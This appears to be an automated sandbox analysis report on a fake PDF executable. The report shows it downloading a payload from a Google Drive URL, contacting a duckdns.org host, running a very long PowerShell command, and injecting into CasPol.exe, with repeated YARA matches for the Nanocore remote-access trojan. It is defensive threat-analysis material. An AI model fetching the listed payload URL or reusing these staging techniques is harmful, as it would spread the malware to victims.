Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=17YCerFFQP3xEpWryCctLLABeKhxmjpC3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/112.0Host: drive.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /download?id=17YCerFFQP3xEpWryCctLLABeKhxmjpC3&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/112.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: drive.google.com
Source: global traffic	DNS traffic detected: DNS query: drive.usercontent.google.com
Source: global traffic	DNS traffic detected: DNS query: 7fxcmft-olcmjfjxdk.duckdns.org

Source: Certificate#U00b7pdf.exe	String found in binary or memory: http://crl.certum.pl/ctnca.crl0k
Source: Certificate#U00b7pdf.exe	String found in binary or memory: http://crl.certum.pl/ctnca2.crl0l
Source: Certificate#U00b7pdf.exe	String found in binary or memory: http://crl.certum.pl/ctsca2021.crl0o
Source: powershell.exe, 00000004.00000002.24020469340.0000000007620000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000005.00000002.28382435662.00000000051F4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: powershell.exe, 00000004.00000002.24013324789.000000000309B000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000005.00000002.28382435662.00000000051F4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: powershell.exe, 00000004.00000002.24023428377.0000000008BA5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.mics
Source: Certificate#U00b7pdf.exe	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: powershell.exe, 00000004.00000002.24019197601.0000000005CAE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000004.00000002.24015082052.0000000004DAA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000004.00000002.24015082052.0000000004DAA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png4
Source: Certificate#U00b7pdf.exe	String found in binary or memory: http://repository.certum.pl/ctnca.cer09
Source: Certificate#U00b7pdf.exe	String found in binary or memory: http://repository.certum.pl/ctnca2.cer09
Source: Certificate#U00b7pdf.exe	String found in binary or memory: http://repository.certum.pl/ctsca2021.cer0
Source: powershell.exe, 00000004.00000002.24015082052.0000000004C41000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Certificate#U00b7pdf.exe	String found in binary or memory: http://subca.ocsp-certum.com01
Source: Certificate#U00b7pdf.exe	String found in binary or memory: http://subca.ocsp-certum.com02
Source: Certificate#U00b7pdf.exe	String found in binary or memory: http://subca.ocsp-certum.com05
Source: powershell.exe, 00000004.00000002.24015082052.0000000004DAA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000004.00000002.24015082052.0000000004DAA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html4
Source: Certificate#U00b7pdf.exe	String found in binary or memory: http://www.certum.pl/CPS0
Source: powershell.exe, 00000004.00000002.24020469340.0000000007620000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000005.00000002.28382435662.00000000051F4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.quovadis.bm0
Source: powershell.exe, 00000004.00000002.24015082052.0000000004C41000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6lB2r
Source: powershell.exe, 00000004.00000002.24019197601.0000000005CAE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000004.00000002.24019197601.0000000005CAE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000004.00000002.24019197601.0000000005CAE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: CasPol.exe, 00000005.00000002.28382435662.000000000519B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/
Source: CasPol.exe, 00000005.00000002.28382435662.000000000519B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/8
Source: CasPol.exe, 00000005.00000002.28382435662.00000000051D8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=17YCerFFQP3xEpWryCctLLABeKhxmjpC3
Source: CasPol.exe, 00000005.00000002.28382435662.00000000051D8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=17YCerFFQP3xEpWryCctLLABeKhxmjpC3P
Source: CasPol.exe, 00000005.00000002.28382435662.00000000051F4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/
Source: CasPol.exe, 00000005.00000002.28382435662.00000000051F4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=17YCerFFQP3xEpWryCctLLABeKhxmjpC3&export=download
Source: powershell.exe, 00000004.00000002.24015082052.0000000004DAA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000004.00000002.24015082052.0000000004DAA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester4
Source: powershell.exe, 00000004.00000002.24019197601.0000000005CAE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000004.00000002.24020469340.0000000007620000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000005.00000002.28382435662.00000000051F4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ocsp.quovadisoffshore.com0

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49777
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49776
Source: unknown	Network traffic detected: HTTP traffic on port 49776 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49777 -> 443

Source: unknown	HTTPS traffic detected: 142.250.191.110:443 -> 192.168.11.20:49776 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.191.129:443 -> 192.168.11.20:49777 version: TLS 1.2

Source: C:\Users\user\Desktop\Certificate#U00b7pdf.exe

Code function: 0_2_0040543E GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,FindCloseChangeNotification,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,

0_2_0040543E

Source: CasPol.exe, 00000005.00000002.28417516925.00000000229E7000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: RegisterRawInputDevices

memstr_75d711f8-5

E-Banking Fraud

Yara detected Nanocore RAT

Source: Yara match	File source: 5.2.CasPol.exe.244c4629.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.CasPol.exe.244c0000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.CasPol.exe.229f3105.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.CasPol.exe.244c0000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.CasPol.exe.229eeadc.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.CasPol.exe.229eeadc.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.CasPol.exe.229e9ca6.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000002.28417516925.00000000229E7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.28422942050.00000000244C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: CasPol.exe PID: 1072, type: MEMORYSTR

System Summary

Malicious sample detected (through community Yara rule)

Source: 5.2.CasPol.exe.244c4629.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 5.2.CasPol.exe.244c4629.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 5.2.CasPol.exe.244c4629.5.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 5.2.CasPol.exe.23fc0000.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 5.2.CasPol.exe.23fc0000.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 5.2.CasPol.exe.23fc0000.4.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 5.2.CasPol.exe.229f3105.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 5.2.CasPol.exe.229f3105.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 5.2.CasPol.exe.244c0000.6.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 5.2.CasPol.exe.229f3105.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 5.2.CasPol.exe.244c0000.6.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 5.2.CasPol.exe.244c0000.6.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 5.2.CasPol.exe.244c0000.6.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 5.2.CasPol.exe.244c0000.6.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 5.2.CasPol.exe.244c0000.6.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 5.2.CasPol.exe.229eeadc.3.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 5.2.CasPol.exe.229eeadc.3.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 5.2.CasPol.exe.229eeadc.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 5.2.CasPol.exe.229eeadc.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 5.2.CasPol.exe.229eeadc.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 5.2.CasPol.exe.229eeadc.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 5.2.CasPol.exe.229e9ca6.1.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 5.2.CasPol.exe.229e9ca6.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 5.2.CasPol.exe.229e9ca6.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 5.2.CasPol.exe.229e9ca6.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 5.2.CasPol.exe.219b1858.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 5.2.CasPol.exe.219b1858.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 5.2.CasPol.exe.219b1858.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000005.00000002.28417516925.00000000229E7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000005.00000002.28417516925.00000000229E7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000005.00000002.28422063726.0000000023FC0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000005.00000002.28422063726.0000000023FC0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects NanoCore Author: ditekSHen
Source: 00000005.00000002.28422063726.0000000023FC0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000005.00000002.28422942050.00000000244C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000005.00000002.28422942050.00000000244C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects NanoCore Author: ditekSHen
Source: 00000005.00000002.28422942050.00000000244C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000005.00000002.28397844456.00000000219A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: Process Memory Space: CasPol.exe PID: 1072, type: MEMORYSTR	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: Process Memory Space: CasPol.exe PID: 1072, type: MEMORYSTR	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown

Very long command line found

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: Commandline size = 19854
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: Commandline size = 19854			Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe

Process Stats: CPU usage > 6%

Source: C:\Users\user\Desktop\Certificate#U00b7pdf.exe

Code function: 0_2_0040336C EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,ExitProcess,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,

0_2_0040336C

Source: C:\Users\user\Desktop\Certificate#U00b7pdf.exe

File created: C:\Windows\resources\0409

Jump to behavior

Source: C:\Users\user\Desktop\Certificate#U00b7pdf.exe	Code function: 0_2_00404C7B	0_2_00404C7B
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Code function: 5_2_23BD2FA8	5_2_23BD2FA8
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Code function: 5_2_23BD23A0	5_2_23BD23A0
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Code function: 5_2_23BD86DD	5_2_23BD86DD
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Code function: 5_2_23BD931F	5_2_23BD931F
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Code function: 5_2_23BD9258	5_2_23BD9258
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Code function: 5_2_23BDAD68	5_2_23BDAD68
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Code function: 5_2_23BD306F	5_2_23BD306F
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Code function: 5_2_23BD3850	5_2_23BD3850
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Code function: 8_2_011904B0	8_2_011904B0
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Code function: 8_2_01190938	8_2_01190938

Source: Certificate#U00b7pdf.exe

Static PE information: invalid certificate

Source: Certificate#U00b7pdf.exe, 00000000.00000000.23297968907.00000000007CB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenamePreexchanging Uneradicable.exeDVarFileInfo$ vs Certificate#U00b7pdf.exe
Source: Certificate#U00b7pdf.exe	Binary or memory string: OriginalFilenamePreexchanging Uneradicable.exeDVarFileInfo$ vs Certificate#U00b7pdf.exe

Source: Certificate#U00b7pdf.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: 5.2.CasPol.exe.244c4629.5.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 5.2.CasPol.exe.244c4629.5.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 5.2.CasPol.exe.244c4629.5.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 5.2.CasPol.exe.23fc0000.4.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 5.2.CasPol.exe.23fc0000.4.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 5.2.CasPol.exe.23fc0000.4.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 5.2.CasPol.exe.229f3105.2.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 5.2.CasPol.exe.229f3105.2.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 5.2.CasPol.exe.244c0000.6.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 5.2.CasPol.exe.229f3105.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 5.2.CasPol.exe.244c0000.6.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 5.2.CasPol.exe.244c0000.6.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 5.2.CasPol.exe.244c0000.6.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 5.2.CasPol.exe.244c0000.6.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 5.2.CasPol.exe.244c0000.6.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 5.2.CasPol.exe.229eeadc.3.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 5.2.CasPol.exe.229eeadc.3.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 5.2.CasPol.exe.229eeadc.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 5.2.CasPol.exe.229eeadc.3.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 5.2.CasPol.exe.229eeadc.3.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 5.2.CasPol.exe.229eeadc.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 5.2.CasPol.exe.229e9ca6.1.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 5.2.CasPol.exe.229e9ca6.1.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 5.2.CasPol.exe.229e9ca6.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 5.2.CasPol.exe.229e9ca6.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 5.2.CasPol.exe.219b1858.0.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 5.2.CasPol.exe.219b1858.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 5.2.CasPol.exe.219b1858.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000005.00000002.28417516925.00000000229E7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000005.00000002.28417516925.00000000229E7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000005.00000002.28422063726.0000000023FC0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000005.00000002.28422063726.0000000023FC0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 00000005.00000002.28422063726.0000000023FC0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
